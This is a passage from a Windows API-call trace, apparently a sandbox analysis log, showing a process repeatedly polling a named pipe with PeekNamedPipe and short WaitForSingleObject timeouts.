lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0087.329] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0087.521] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0087.521] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0087.642] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0087.642] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.420] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.420] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.447] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.447] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.476] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.476] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.507] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.507] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.538] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.538] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.569] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.569] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.602] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.602] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.648] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.648] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.678] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.679] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.710] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.710] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.741] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.741] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.772] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.772] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.804] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.804] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.839] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.839] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0089.875] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.875] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0090.342] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0090.346] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0090.365] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0090.365] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.475] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.475] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.630] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.630] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.659] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.659] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.703] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.703] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.730] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.730] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.762] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.762] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.885] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.885] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.910] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.910] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.942] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.942] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0091.985] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.985] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0092.199] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0092.200] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0092.412] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0092.413] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0092.443] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0092.443] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0092.480] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0092.480] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0093.650] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.650] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0094.190] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.191] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0094.254] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.254] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0094.281] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0094.281] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.352] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.353] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.464] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.464] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.485] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.485] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.513] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.513] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.544] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.544] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.576] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.576] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0095.606] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0095.606] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0096.126] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.126] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0096.182] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.182] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0096.231] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0096.231] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0097.054] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.054] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0097.260] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.260] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0097.804] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.804] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0097.834] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.834] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0097.868] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0097.868] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0098.865] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0098.865] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0099.024] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0099.026] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0099.495] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0099.495] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0099.532] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0099.532] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0099.557] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0099.557] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.619] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.619] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.645] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.645] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.676] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.677] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.755] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.755] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.786] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.786] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.817] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.817] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.848] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.848] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.879] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.879] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.910] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.910] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.958] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.958] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0x14) returned 0x102 [0100.988] PeekNamedPipe (in: hNamedPipe=0xb0, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18f888*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0100.988] WaitForSingleObject (hHandle=0x114, 